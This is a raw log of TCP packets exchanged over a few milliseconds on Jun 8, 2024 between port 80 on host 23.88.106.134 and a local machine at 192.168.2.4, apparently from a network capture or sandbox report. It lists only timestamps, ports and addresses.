Jun 8, 2024 20:22:07.167809963 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167823076 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167843103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167856932 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167877913 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167890072 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167911053 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167929888 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167946100 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167958021 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.167979956 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.167994022 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168018103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168029070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168056011 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168067932 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168091059 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168104887 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168124914 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168138981 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168159008 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168173075 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168191910 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168209076 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168226004 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168241024 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168258905 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168277979 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168296099 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168311119 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168330908 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168345928 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168365002 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168379068 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168410063 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168416023 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168452978 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168463945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168502092 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168508053 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168554068 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168555975 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168590069 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168605089 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168623924 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168637991 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168657064 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168672085 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168690920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168704987 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168725014 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168740988 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168759108 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168776989 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168792009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168808937 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168819904 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168834925 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168838024 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168850899 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168859005 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168867111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168880939 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168883085 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168899059 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168901920 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168915987 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168926954 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168931961 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168950081 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168970108 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168975115 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.168987989 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.168998003 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169003963 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169018030 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169030905 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169032097 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169045925 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169060946 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169070959 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169075966 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169090986 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169094086 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169106007 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169121981 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169130087 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169137955 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169153929 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169159889 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169169903 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169186115 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169186115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169203043 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169207096 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169219017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169234991 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169241905 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169250965 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169266939 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169276953 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169282913 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169298887 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169301033 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169315100 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169332027 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169333935 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169348955 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169372082 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169375896 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169394970 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169399977 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169410944 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169421911 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169425964 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169441938 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169456959 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169460058 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169472933 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169488907 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169502020 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169504881 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169522047 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169526100 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169537067 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169550896 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169553995 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169569969 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169585943 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169589996 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169600964 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169617891 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169624090 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169632912 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169647932 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169648886 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169665098 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169681072 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169684887 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169697046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169713020 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169720888 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169728994 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169744015 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169744968 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169760942 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169770002 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169778109 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169794083 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169809103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169823885 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169831991 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169840097 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169856071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169873953 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169876099 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169897079 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169904947 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169914007 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169926882 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169929981 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169956923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169965029 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.169972897 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.169989109 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170001030 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170006037 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170022964 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170025110 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170039892 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170056105 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170061111 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170070887 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170094013 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170094967 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170111895 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170123100 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170128107 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170144081 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170149088 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170160055 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170172930 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170180082 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170187950 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170203924 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170219898 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170228004 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170243025 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170244932 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170259953 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170274019 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170278072 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170300961 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170316935 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170321941 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170341015 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170350075 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170357943 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170373917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170375109 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170389891 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170406103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170409918 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170422077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170438051 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170443058 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170454025 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170466900 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170469999 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170485973 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170490980 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170502901 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170519114 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170525074 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170535088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170551062 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170566082 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170567989 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170582056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170592070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170598030 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170613050 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170614958 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170629978 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170645952 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170650005 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170663118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170680046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170691013 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170696974 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170712948 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170717955 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170742035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170757055 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170758009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170773983 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170789003 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170792103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170808077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170823097 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170823097 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170840025 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170855999 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170857906 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170871019 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170881033 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170886993 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170902967 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170902967 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170917988 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170933962 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170937061 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170948982 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170964003 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170974016 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.170979977 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170994997 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.170999050 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171014071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171027899 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171030998 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171041012 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171051025 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171067953 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171080112 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171082973 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171099901 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171114922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171114922 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171132088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171140909 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171148062 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171163082 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171164036 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171188116 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171200991 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171205044 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171221018 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171237946 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171237946 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171253920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171262026 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171269894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171283960 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171288013 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171304941 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171317101 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171320915 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171338081 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171354055 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171356916 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171370029 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171375990 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171386957 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171401978 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171411991 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171417952 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171435118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171447992 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171451092 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171467066 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171469927 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171483040 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171499014 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171505928 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171515942 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171530962 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171538115 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171546936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171562910 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171562910 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171581030 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171583891 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171597004 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171613932 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171619892 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171628952 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171644926 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171649933 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171662092 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171674013 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171678066 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171690941 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171694994 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171711922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171727896 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171730042 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171744108 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171760082 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171766043 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171776056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171792030 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171792030 CEST	80	49731	23.88.106.134	192.168.2.4
